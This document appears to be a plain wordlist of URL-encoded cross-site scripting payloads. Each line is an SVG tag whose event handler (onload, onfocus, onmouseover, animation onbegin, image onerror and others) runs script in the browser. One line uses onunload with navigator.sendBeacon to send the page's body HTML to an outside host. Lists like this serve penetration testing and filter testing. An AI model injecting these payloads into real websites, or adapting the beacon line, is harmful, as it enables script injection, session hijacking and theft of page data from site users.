%3Csvg%20draggable%3D%22true%22%20ondrag%3D%22alert%281%29%22%3Etest%3C%2Fsvg%3E
%3Csvg%20draggable%3D%22true%22%20ondragend%3D%22alert%281%29%22%3Etest%3C%2Fsvg%3E
%3Csvg%20draggable%3D%22true%22%20ondragenter%3D%22alert%281%29%22%3Etest%3C%2Fsvg%3E
%3Csvg%20draggable%3D%22true%22%20ondragleave%3D%22alert%281%29%22%3Etest%3C%2Fsvg%3E
%3Csvg%20draggable%3D%22true%22%20ondragstart%3D%22alert%281%29%22%3Etest%3C%2Fsvg%3E
%3Csvg%20id%3Dx%20onfocus%3Dalert%281%29%3E
%3Csvg%20id%3Dx%20onfocusin%3Dalert%281%29%3E
%3Csvg%20id%3Dx%20tabindex%3D1%20onactivate%3Dalert%281%29%3E%3C%2Fsvg%3E
%3Csvg%20id%3Dx%20tabindex%3D1%20onbeforeactivate%3Dalert%281%29%3E%3C%2Fsvg%3E
%3Csvg%20id%3Dx%20tabindex%3D1%20onbeforedeactivate%3Dalert%281%29%3E%3C%2Fsvg%3E%3Cinput%20autofocus%3E
%3Csvg%20id%3Dx%20tabindex%3D1%20ondeactivate%3Dalert%281%29%3E%3C%2Fsvg%3E%3Cinput%20id%3Dy%20autofocus%3E
%3Csvg%20onafterscriptexecute%3Dalert%281%29%3E%3Cscript%3E1%3C%2Fscript%3E
%3Csvg%20onbeforecopy%3D%22alert%281%29%22%20contenteditable%3Etest%3C%2Fsvg%3E
%3Csvg%20onbeforecut%3D%22alert%281%29%22%20contenteditable%3Etest%3C%2Fsvg%3E
%3Csvg%20onbeforepaste%3D%22alert%281%29%22%20contenteditable%3Etest%3C%2Fsvg%3E
%3Csvg%20onbeforescriptexecute%3Dalert%281%29%3E%3Cscript%3E1%3C%2Fscript%3E
%3Csvg%20onblur%3Dalert%281%29%20tabindex%3D1%20id%3Dx%3E%3C%2Fsvg%3E%3Cinput%20autofocus%3E
%3Csvg%20onclick%3D%22alert%281%29%22%3Etest%3C%2Fsvg%3E
%3Csvg%20oncontextmenu%3D%22alert%281%29%22%3Etest%3C%2Fsvg%3E
%3Csvg%20oncopy%3Dalert%281%29%20value%3D%22XSS%22%20autofocus%20tabindex%3D1%3Etest
%3Csvg%20oncut%3Dalert%281%29%20value%3D%22XSS%22%20autofocus%20tabindex%3D1%3Etest
%3Csvg%20ondblclick%3D%22alert%281%29%22%20autofocus%20tabindex%3D1%3Etest%3C%2Fsvg%3E
%3Csvg%20onfocusout%3Dalert%281%29%20tabindex%3D1%20id%3Dx%3E%3C%2Fsvg%3E%3Cinput%20autofocus%3E
%3Csvg%20onkeydown%3D%22alert%281%29%22%20contenteditable%3Etest%3C%2Fsvg%3E
%3Csvg%20onkeypress%3D%22alert%281%29%22%20contenteditable%3Etest%3C%2Fsvg%3E
%3Csvg%20onkeyup%3D%22alert%281%29%22%20contenteditable%3Etest%3C%2Fsvg%3E
%3Csvg%20onload%3Dalert%281%29%3E
%3Csvg%20onmousedown%3D%22alert%281%29%22%3Etest%3C%2Fsvg%3E
%3Csvg%20onmouseenter%3D%22alert%281%29%22%3Etest%3C%2Fsvg%3E
%3Csvg%20onmouseleave%3D%22alert%281%29%22%3Etest%3C%2Fsvg%3E
%3Csvg%20onmousemove%3D%22alert%281%29%22%3Etest%3C%2Fsvg%3E
%3Csvg%20onmouseout%3D%22alert%281%29%22%3Etest%3C%2Fsvg%3E
%3Csvg%20onmouseover%3D%22alert%281%29%22%3Etest%3C%2Fsvg%3E
%3Csvg%20onmouseup%3D%22alert%281%29%22%3Etest%3C%2Fsvg%3E
%3Csvg%20onmousewheel%3Dalert%281%29%3Erequires%20scrolling
%3Csvg%20onpaste%3D%22alert%281%29%22%20contenteditable%3Etest%3C%2Fsvg%3E
%3Csvg%20onpointerdown%3Dalert%281%29%3EXSS%3C%2Fsvg%3E
%3Csvg%20onpointerenter%3Dalert%281%29%3EXSS%3C%2Fsvg%3E
%3Csvg%20onpointerleave%3Dalert%281%29%3EXSS%3C%2Fsvg%3E
%3Csvg%20onpointermove%3Dalert%281%29%3EXSS%3C%2Fsvg%3E
%3Csvg%20onpointerout%3Dalert%281%29%3EXSS%3C%2Fsvg%3E
%3Csvg%20onpointerover%3Dalert%281%29%3EXSS%3C%2Fsvg%3E
%3Csvg%20onpointerrawupdate%3Dalert%281%29%3EXSS%3C%2Fsvg%3E
%3Csvg%20onpointerup%3Dalert%281%29%3EXSS%3C%2Fsvg%3E
%3Csvg%20onunload%3Dnavigator.sendBeacon%28%27%2F%2Fhttps%3A%2F%2Fssl.portswigger-labs.net%2F%27%2Cdocument.body.innerHTML%29%3E
%3Csvg%3E%3Canimate%20onbegin%3Dalert%281%29%20attributeName%3Dx%20dur%3D1s%3E
%3Csvg%3E%3Canimate%20onend%3Dalert%281%29%20attributeName%3Dx%20dur%3D1s%3E
%3Csvg%3E%3Canimate%20onrepeat%3Dalert%281%29%20attributeName%3Dx%20dur%3D1s%20repeatCount%3D2%20%2F%3E
%3Csvg%3E%3Canimatetransform%20onbegin%3Dalert%281%29%20attributeName%3Dtransform%3E
%3Csvg%3E%3Canimatetransform%20onend%3Dalert%281%29%20attributeName%3Dtransform%20dur%3D1s%3E
%3Csvg%3E%3Canimatetransform%20onrepeat%3Dalert%281%29%20attributeName%3Dtransform%20repeatCount%3D2%20dur%3D1s%3E
%3Csvg%3E%3Cimage%20href%3D1%20onerror%3Dalert%281%29%3E
%3Csvg%3E%3Cimage%20href%3Dvalidimage.png%20onload%3Dalert%281%29%3E
%3Csvg%3E%3Cpath%3E%3CanimateMotion%20onbegin%3Dalert%281%29%20dur%3D%221s%22%20repeatCount%3D%221%22%3E
%3Csvg%3E%3Cpath%3E%3CanimateMotion%20onend%3Dalert%281%29%20dur%3D1s%20repeatCount%3D1%3E
%3Csvg%3E%3Cpath%3E%3CanimateMotion%20onrepeat%3Dalert%281%29%20dur%3D%221s%22%20repeatCount%3D%222%22%3E
%3Csvg%3E%3Cset%20onbegin%3Dalert%281%29%20attributename%3Dx%20dur%3D1s%3E
%3Csvg%3E%3Cset%20onend%3Dalert%281%29%20attributename%3Dx%20dur%3D1s%3E
%3Csvg%3E%3Cset%20onrepeat%3Dalert%281%29%20attributename%3Dx%20dur%3D1s%20repeatcount%3D2%3E
